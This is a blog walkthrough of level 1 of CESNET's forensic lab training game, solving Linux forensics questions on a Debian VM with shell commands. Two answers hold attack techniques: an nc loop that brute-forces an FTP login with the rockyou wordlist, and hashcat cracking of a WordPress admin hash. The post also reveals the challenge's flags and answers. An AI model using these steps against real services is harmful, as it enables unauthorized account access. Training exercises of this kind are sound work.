Forensic Lab Game Zero - Level 1 Results

The goal of the post is to provide solutions for the first level of the game for "hackers" created by forensic lab of CESNET association. With this game CESNET introduces a work of forensic analysts and test your knowledge of Linux OS. They are several assignments and practical tasks included inside Debian image which is available for download here.  The question / answer sheet is located inside the home directory of user kassad.


Picture 1 - Answer Sheet

1. In the Linux image, which username is logged in automatically on boot?

Check the desktop environment.

kassad@debian1989:~$ echo $DESKOP_SESSION

Check if automated login is enabled for Gnome desktop.

kassad@debian1989:~$ grep 'AutomaticLogin' /etc/gdm3/daemon.conf
AutomaticLoginEnable = true
AutomaticLogin = kassad

The automated login is enabled for the user kassad.  Now we need to compute the sha1 hash for the result.

kassad@debian1989:~$ echo -n 'kassad' | sha1sum

2. On the provided Linux image, what is the “ls” command aliased to for user from question 1 ?

kassad@debian1989:~$ type ls
ls is aliased to `ls --color=auto'

We can get the result also by checking the content of the file /home/kassad/.bashrc.

kassad@debian1989:~$ grep 'alias ls' /home/kassad/.bashrc
alias ls='ls --color=auto'

kassad@debian1989:~$ echo -n 'ls --color=auto' | sha1sum

3. Which of the following commands are build into the Bash shell ? - cat, ls, echo, awk

kassad@debian1989:~$ type cat ls echo awk | grep builtin
echo is a shell builtin

kassad@debian1989:~$ echo -n echo | sha1sum

4. Which non-root user on the Linux image can execute /bin/bsd-csh?

Check privileges.

kassad@debian1989:~$ ls -l /bin/bsd-csh
-rwxr-x--- 1 root lamia 143144 Jul 18 2014 /bin/bsd-csh

Find who is member of the group lamia.

kassad@debian1989:~$ grep 'lamia' /etc/group

Check the name of the user with uid=1001.

kassad@debian1989:~$ cat /etc/passwd | grep 1001
uid=1001(lamia) gid=1001(lamia) groups=1001(lamia)

kassad@debian1989:~$ echo -n 'lamia' | sha1sum

5. Which command will open the manual page for nmap ?

kassad@debian1989:~$ echo -n 'man nmap' | sha1sum

6. There is an FTP service running on the provided Linux VM, use list of known weak passwords from one of the tools located in /opt/tools/ to recover the password for the account dure and retrieve content of flag.txt from his home directory

a) Extract dictionary

kassad@debian1989:~$ cp /opt/tool/rockyou.txt.bz2 /home/kassad/
kassad@debian1989:~$ bzip2 -d rockyou.txt.bz2

b) FTP server bruteforce script

The script uses nc to connect to FTP server on localhost with passwords from the file rockyou.txt and username dure. If the script detects exit code 230 (successful connect) the password is shown and script finishes.

kassad@debian1989:~$ while read lines; do echo "trying: $lines"; echo -e "USER dure\nPASS $lines\nQUIT" | nc localhost 21 | grep -q "230" && echo "pass: $lines" && break; done < rockyou.txt

pass for user dure is a1b2c3

c) Connect to FTP server and download file flag.txt

kassad@debian1989:~$ ftp -n localhost 21
ftp> user dure
230 Login successful.
ftp> mget flag.txt

kassad@debian1989:~$ cat flag.txt

kassad@debian1989:~$ echo -n 'da79c8dd34410073244ef8c85cf6da726f19d230' | sha1sum

7. A backup of a WordPress database is located in your home directory. Recover a plaintext password for admin acount. For offline cracking a long dictionaries are typically used

a) Locate hash
The following line in the file wordpress.sample.sql contains hash for user admin.

INSERT INTO `wp_users` VALUES (1,'admin','$P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0','admin','admin@localhost.loc','','2013-03-27 16:30:57','',0,'admin');

The hash is: $P$BKNIHw43WhqEgh/1jjRa1pMnDMIlbT0

b) Identify hash

Here is the Hash online identifier. Your hash may be one of the following:

- phpass, MD5(WordPress), MD5(phpBB3)

c) Install Hashcat

I have installed the Hashcat on host computer to speed up hash cracking process.

$ wget
$ mkdir hashcat
$ mv hashcat-2.00.7z hashcat
$ cd hashcat/
$ 7z e hashcat-2.00.7z

d) Crack hash with Hashcat

$ ./hashcat-cli64.bin -m 400 /home/brezular/Downloads/forenzna/hash.txt /home/brezular/Downloads/forenzna/rockyou.txt

Password for user admin is budakbageur.

$ echo -n 'budakbageur' | sha1sum

8. There are two texfiles in /home/kassad directory, system_hashes_baseline and system_hashes_incident0. Using those information find the probable file which was added during the security incident. Use SHA1 of the file as answer

a) Count the words in both files

kassad@debian1989:~$ wc -l  system_hashes_incident0.txt system_hashes_baseline.txt
313 system_hashes_incident0.txt
312 system_hashes_baseline.txt
625 total

Now we are sure that a file filesystem_hashes_incident0.txt has plus one hash comparing to the original hash filesystem_hashes_baseline.txt. All we need to do is to compare every line from the file filesystem_hashes_incident0.txt filesystem_hashes_incident0.txt  with the content of the original file. If the line is not found, we have our hash.

kassad@debian1989:~$ while read line; do hash1=$(echo "$line"| cut -d " " -f1); grep -q "$hash1" system_hashes_baseline.txt; rval="$?"; [ "$rval" == 1 ] && echo "$line"; done < /home/kassad/system_hashes_incident0.txt

7ff56d9d0b8c4fc0a1a62e452ba93b43b30ce483 /bin/netcat.real

The file /bin/netcat.real was added by attacker.

kassad@debian1989:~$ echo -n '7ff56d9d0b8c4fc0a1a62e452ba93b43b30ce483' | sha1sum

9. Found most active attacker from the given logfile /home/kassad/auth.log

kassad@debian1989:~$ grep -o -w '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' auth.log | sort | uniq -c | sort -bgr


The most active attacker has IP address

kassad@debian1989:~$ echo -n '' | sha1sum

10. What type of file is /home/kassad/somefile - disk image, zip file, text file, HTML page

kassad@debian1989:~$ file /home/kassad/somefile
somefile: DOS/MBR boot sector, code offset 0x3e+2, OEM-ID "MSWIN4.0", root entries 224, sectors 2880 (volumes <=32 MB) , sectors/FAT 9, sectors/track 18, serial number 0x350518e3, label: "BOOT95A ", FAT (12 bit), followed by FAT

kassad@debian1989:~$ echo -n 'disk image' | sha1sum
19d43c36d41667b1b63e1220cfc8498605f9ffcc -

11. Mount the drive image located in your home directory and retrieve content of flag.txt stored inside. Administrator of virtual machine already gave you permissions to run mount and unmount commands as root

kassad@debian1989:~$ mkdir mount
kassad@debian1989:~$ sudo mount -t vfat somefile mount/

kassad@debian1989:~$ cat /home/kassad/mount/flag.txt

kassad@debian1989:~$ echo -n '75df0cfbc5757721f18f3ab1b3b0603ff0c1644f' | sha1sum

12. There is another file hidden inside provided disk image, find it and retrieve flag from it's metadata

kassad@debian1989:~$ exiftool -r /home/kassad/mount/.hype.jpg | grep Comment | cut -d ":" -f2

kassad@debian1989:~$ echo -n '548f59ce9ad3b8d0ce477ff51a0eddbad474022e' | sha1sum

13. Which of the user's of provided VM is equivalent to root from Linux perspective?

kassad@debian1989:~$ cat /etc/passwd | grep -w '0'

User simmons has id 0 so he has root privileges.

kassad@debian1989:~$ echo -n simmons | sha1sum

14. User kassad can run several programs using sudo. Based on commands available, find and retrieve the flag

kassad@debian1989:~$ sudo -l -U kassad

User kassad may run the following commands on debian1989:
(root) NOPASSWD: /bin/mount, /bin/umount
(lamia) NOPASSWD: /usr/bin/get_a_flag

kassad@debian1989:~$ sudo -u lamia /usr/bin/get_a_flag
Here is your flag lamia: 87df8cb351dc718369ae900297bafbb33fffa28e

kassad@debian1989:~$ echo -n '87df8cb351dc718369ae900297bafbb33fffa28e' | sha1sum 6076243406b4cd05b9dc7fcfaaab7fcea8438c5e

15. Find a flag set in the kernel's command line arguments

kassad@debian1989:~$ cat /proc/cmdline
BOOT_IMAGE=/boot/vmlinuz-3.16.0-4-amd64 root=UUID=d6afdc70-c685-4545-a442-bffa3c4a0170 ro quiet 49c11fb5e18585445a5d121b35a4ea138c327489

kassad@debian1989:~$ echo -n '49c11fb5e18585445a5d121b35a4ea138c327489' | sha1sum ea557ae465386d60e2c46273b8d8abafad01972a

End of level 1.

Leave a comment

Your email address will not be published. Required fields are marked *